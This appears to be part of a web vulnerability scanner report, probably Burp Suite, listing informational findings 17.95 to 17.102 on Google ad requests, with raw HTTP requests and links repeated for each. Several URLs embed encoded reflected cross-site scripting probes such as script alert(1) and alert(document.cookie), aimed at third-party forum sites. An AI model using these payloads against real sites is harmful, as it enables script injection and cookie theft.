GET /pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698945&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D55134414&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677345923&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as%2C300x250_as&correlator=1296677340510&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=863073551&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&ref=http%3A%2F%2Fburp%2Fshow%2F43&fu=0&ifi=3&dtd=24&xpc=CAA4nretiy&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(1)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

17.95. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5638914851100523&output=html&h=250&slotname=1860322786&w=300&lmt=1297024385&flash=10.1.103&url=http%3A%2F%2Fwww.worldmastiffforum.com%2F%3Fd11e2%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ef6a009cb502%3D1&dt=1297002785625&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=1860322786%2C1860322786&correlator=1297002784743&frm=0&adk=3799866133&ga_vid=45724812.1297002785&ga_sid=1297002785&ga_hid=673988757&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1031&ref=http%3A%2F%2Fburp%2Fshow%2F74&fu=0&ifi=3&dtd=2&xpc=RVkYNi6H2r&p=http%3A//www.worldmastiffforum.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.worldmastiffforum.com/%253Fd11e2%252522%25253E%25253Cscript%25253Ealert(1)%25253C/script%25253Ef6a009cb502%253D1%26hl%3Den%26client%3Dca-pub-5638914851100523%26adU%3DDog.JustAnswer.com%26adT%3DAsk%2Ba%2BDog%2BVet%2BOnline%2BNow%26adU%3DMastiffRescue.Local.com%26adT%3DMastiff%2BRescue%2BCenters%26adU%3Dwww.DogBiteInjuryHelpLine.com%26adT%3DMastiff%2BAttack%2BLawsuit%26adU%3Dwww.amazon.com%26adT%3DC-Store%2BBook%26gl%3DUS&usg=AFQjCNEyZDWogBCKNlvci3gJNUESDVAV2g

Request

GET /pagead/ads?client=ca-pub-5638914851100523&output=html&h=250&slotname=1860322786&w=300&lmt=1297024385&flash=10.1.103&url=http%3A%2F%2Fwww.worldmastiffforum.com%2F%3Fd11e2%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ef6a009cb502%3D1&dt=1297002785625&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=1860322786%2C1860322786&correlator=1297002784743&frm=0&adk=3799866133&ga_vid=45724812.1297002785&ga_sid=1297002785&ga_hid=673988757&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1031&ref=http%3A%2F%2Fburp%2Fshow%2F74&fu=0&ifi=3&dtd=2&xpc=RVkYNi6H2r&p=http%3A//www.worldmastiffforum.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.worldmastiffforum.com/?d11e2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef6a009cb502=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

17.96. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=468x60_as&output=html&h=60&w=468&lmt=1296698940&channel=2660416438&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D78091123&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677340464&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296677340510&frm=0&adk=1439102223&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=863073551&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&ref=http%3A%2F%2Fburp%2Fshow%2F43&fu=0&ifi=1&dtd=71&xpc=PKtuaqHle9&p=http%3A//boardreader.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/images/ainw_000000.gif
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.boardreader.com/domain/2mdn.net/x22%253Febef7%252522%25253E%25253Cscript%25253Ealert(1)%25253C/script%25253E6f696982a6d%253D1%26hl%3Den%26client%3Dca-pub-4537085524273794%26adU%3Dwww.Consumer-Rankings.com/Hosting%26adT%3D2010%2526%252339%253Bs%2BBest%2BWeb%2BHosts%26adU%3Dwww.Register.com%26adT%3DPurchase%2BDomain%2BNames%26gl%3DUS&usg=AFQjCNHy19LylhXEFddqhjOgFYejaw41qw

Request

GET /pagead/ads?client=ca-pub-4537085524273794&format=468x60_as&output=html&h=60&w=468&lmt=1296698940&channel=2660416438&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D78091123&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677340464&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296677340510&frm=0&adk=1439102223&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=863073551&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&ref=http%3A%2F%2Fburp%2Fshow%2F43&fu=0&ifi=1&dtd=71&xpc=PKtuaqHle9&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(1)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

17.97. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=468x60_as&output=html&h=60&w=468&lmt=1296699012&channel=2660416438&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D82020006&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677412110&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296677412133&frm=0&adk=1439102223&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=1108361215&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&ref=http%3A%2F%2Fburp%2Fshow%2F44&fu=0&ifi=1&dtd=47&xpc=IrpSufi6Il&p=http%3A//boardreader.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/images/ainw_000000.gif
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.boardreader.com/domain/2mdn.net/x22%253Febef7%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253E6f696982a6d%253D1%26hl%3Den%26client%3Dca-pub-4537085524273794%26adU%3Dwww.Moxiesoft.com%26adT%3DIntegrating%2BLive%2BChat%253F%26adU%3DPhoenix.edu%26adT%3DUniversity%2Bof%2BPhoenix%25C2%25AE%26gl%3DUS&usg=AFQjCNGF-bDT-w3GuxdOww_Nw2-tnI2g0A

Request

GET /pagead/ads?client=ca-pub-4537085524273794&format=468x60_as&output=html&h=60&w=468&lmt=1296699012&channel=2660416438&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D82020006&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677412110&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296677412133&frm=0&adk=1439102223&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=1108361215&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&ref=http%3A%2F%2Fburp%2Fshow%2F44&fu=0&ifi=1&dtd=47&xpc=IrpSufi6Il&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

17.98. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8042276531249348&format=728x90_as&output=html&h=90&w=728&lmt=1296704839&channel=0484589010&ad_type=text&color_bg=fffeb8&color_border=cccccc&color_link=0088ce&color_text=0088ce&color_url=cccccc&flash=10.1.103&url=http%3A%2F%2Fmedienfreunde.com%2Flab%2Finnerfade%2F&dt=1296683239748&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as_rimg%2C728x90_as&correlator=1296683239707&pv_ch=0484589010%2B&frm=0&adk=3410287751&ga_vid=1081738529.1296683240&ga_sid=1296683240&ga_hid=821202468&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&ref=http%3A%2F%2Fburp%2Fshow%2F50&fu=0&ifi=3&dtd=20&xpc=7dVIqhKr27&p=http%3A//medienfreunde.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://medienfreunde.com/lab/innerfade/%26hl%3Den%26client%3Dca-pub-8042276531249348%26adU%3Dwww.nchsoftware.com/slideshow%26adT%3DSlide%2BShow%2BSoftware%26adU%3Dwww.Wix.com%26adT%3DFree%2BPhotography%2BWebsite%26adU%3Dwww.TribYoute.com%26adT%3DProfessional%2BSlideshows%26gl%3DUS&usg=AFQjCNEhZzKidi0nYGVjQeLwLqYO-ZoNeg

Request

GET /pagead/ads?client=ca-pub-8042276531249348&format=728x90_as&output=html&h=90&w=728&lmt=1296704839&channel=0484589010&ad_type=text&color_bg=fffeb8&color_border=cccccc&color_link=0088ce&color_text=0088ce&color_url=cccccc&flash=10.1.103&url=http%3A%2F%2Fmedienfreunde.com%2Flab%2Finnerfade%2F&dt=1296683239748&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as_rimg%2C728x90_as&correlator=1296683239707&pv_ch=0484589010%2B&frm=0&adk=3410287751&ga_vid=1081738529.1296683240&ga_sid=1296683240&ga_hid=821202468&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&ref=http%3A%2F%2Fburp%2Fshow%2F50&fu=0&ifi=3&dtd=20&xpc=7dVIqhKr27&p=http%3A//medienfreunde.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://medienfreunde.com/lab/innerfade/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

17.99. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0993147863874386&format=250x250_as&output=html&h=250&w=250&lmt=1296592128&channel=9785752589&ad_type=text_&alternate_ad_url=http%3A%2F%2Fwww.ppcse.net&color_bg=ffffff&color_border=ffffff&color_link=0066cc&color_text=000000&color_url=F2F2F2&flash=10.1.103&url=http%3A%2F%2Fwww.montanaplates.com%2F880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html&dt=1296570528513&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296570528580&frm=0&adk=3476469855&ga_vid=630710686.1296570529&ga_sid=1296570529&ga_hid=1306161521&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=1012&fu=0&ifi=1&dtd=209&xpc=sUcELk5FrH&p=http%3A//www.montanaplates.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html%26hl%3Den%26client%3Dca-pub-0993147863874386%26adU%3Dwww.peerlesssteel.com%26adT%3DPeerless%2BSteel%2B-%2BMI%2B%2526amp%253B%2BOH%26adU%3DBing.com/Shopping%26adT%3DSnowman%2BDinner%2BPlates%26adU%3Dwww.WallplateWarehouse.com%26adT%3DStainless%2BSteel%2BWallplate%26gl%3DUS&usg=AFQjCNHMNLmuJG4ipiwpdPO_f4-yKiWy3g

Request

GET /pagead/ads?client=ca-pub-0993147863874386&format=250x250_as&output=html&h=250&w=250&lmt=1296592128&channel=9785752589&ad_type=text_&alternate_ad_url=http%3A%2F%2Fwww.ppcse.net&color_bg=ffffff&color_border=ffffff&color_link=0066cc&color_text=000000&color_url=F2F2F2&flash=10.1.103&url=http%3A%2F%2Fwww.montanaplates.com%2F880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html&dt=1296570528513&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296570528580&frm=0&adk=3476469855&ga_vid=630710686.1296570529&ga_sid=1296570529&ga_hid=1306161521&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=1012&fu=0&ifi=1&dtd=209&xpc=sUcELk5FrH&p=http%3A//www.montanaplates.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

17.100. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0993147863874386&format=250x250_as&output=html&h=250&w=250&lmt=1296592128&channel=9785752589&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fwww.ppcse.net&color_bg=ffffff&color_border=ffffff&color_link=0066cc&color_text=000000&color_url=F2F2F2&flash=10.1.103&url=http%3A%2F%2Fwww.montanaplates.com%2F880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html&dt=1296570528728&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=250x250_as&correlator=1296570528580&pv_ch=9785752589%2B&frm=0&adk=3406728932&ga_vid=630710686.1296570529&ga_sid=1296570529&ga_hid=1306161521&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=1012&fu=0&ifi=2&dtd=4&xpc=gzOoabzJJ8&p=http%3A//www.montanaplates.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html%26hl%3Den%26client%3Dca-pub-0993147863874386%26adU%3Dwww.saintcorporation.com%26adT%3DSaint%2BExploit%26adU%3Dwww.LoopNet.com/FarmsForSale%26adT%3DFarms%2BFor%2BSale%26adU%3Dmitchellbesthomes.com/%26adT%3DEstate%2BProperties%2Bin%2BVA%26gl%3DUS&usg=AFQjCNEtxmANeMcqIT1SoY8nVanpkAe_HA

Request

GET /pagead/ads?client=ca-pub-0993147863874386&format=250x250_as&output=html&h=250&w=250&lmt=1296592128&channel=9785752589&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fwww.ppcse.net&color_bg=ffffff&color_border=ffffff&color_link=0066cc&color_text=000000&color_url=F2F2F2&flash=10.1.103&url=http%3A%2F%2Fwww.montanaplates.com%2F880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html&dt=1296570528728&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=250x250_as&correlator=1296570528580&pv_ch=9785752589%2B&frm=0&adk=3406728932&ga_vid=630710686.1296570529&ga_sid=1296570529&ga_hid=1306161521&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=1012&fu=0&ifi=2&dtd=4&xpc=gzOoabzJJ8&p=http%3A//www.montanaplates.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

17.101. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1296698618&flash=10.1.103&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fsecure.avanegate.com.html&dt=1296677018664&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296677018689&frm=0&adk=1607234649&ga_vid=1501870982.1296677019&ga_sid=1296677019&ga_hid=1896820519&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=969&fu=0&ifi=1&dtd=193&xpc=940X3IE764&p=file%3A//

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/secure.avanegate.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.facebook.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHhidpdOxcYZ68CN-472caRIclFng

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1296698618&flash=10.1.103&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fsecure.avanegate.com.html&dt=1296677018664&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296677018689&frm=0&adk=1607234649&ga_vid=1501870982.1296677019&ga_sid=1296677019&ga_hid=1896820519&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1036&bih=969&fu=0&ifi=1&dtd=193&xpc=940X3IE764&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

17.102. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698959&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D24449163&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677359026&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as%2C300x250_as&correlator=1296677358676&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=3&dtd=43&xpc=pQKAErLDpJ&p=http%3A//boardreader.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/images/ainw_000000.gif
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.boardreader.com/domain/2mdn.net/x22%253Febef7%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253E6f696982a6d%253D1%26hl%3Den%26client%3Dca-pub-4537085524273794%26adU%3Dwww.SageAbra.com%26adT%3DPayroll%2BCheck%2BSoftware%26adU%3DGoDaddy.com%26adT%3DGoDaddy%2B%25231%2Bdomain%2Bnames%26adU%3Dwww.DryEraseBoard.com%26adT%3DEnclosed%2BBulletin%2BBoards%26gl%3DUS&usg=AFQjCNF2cD5Z0E70bPxef-bL8qRdd3nXSA

Request

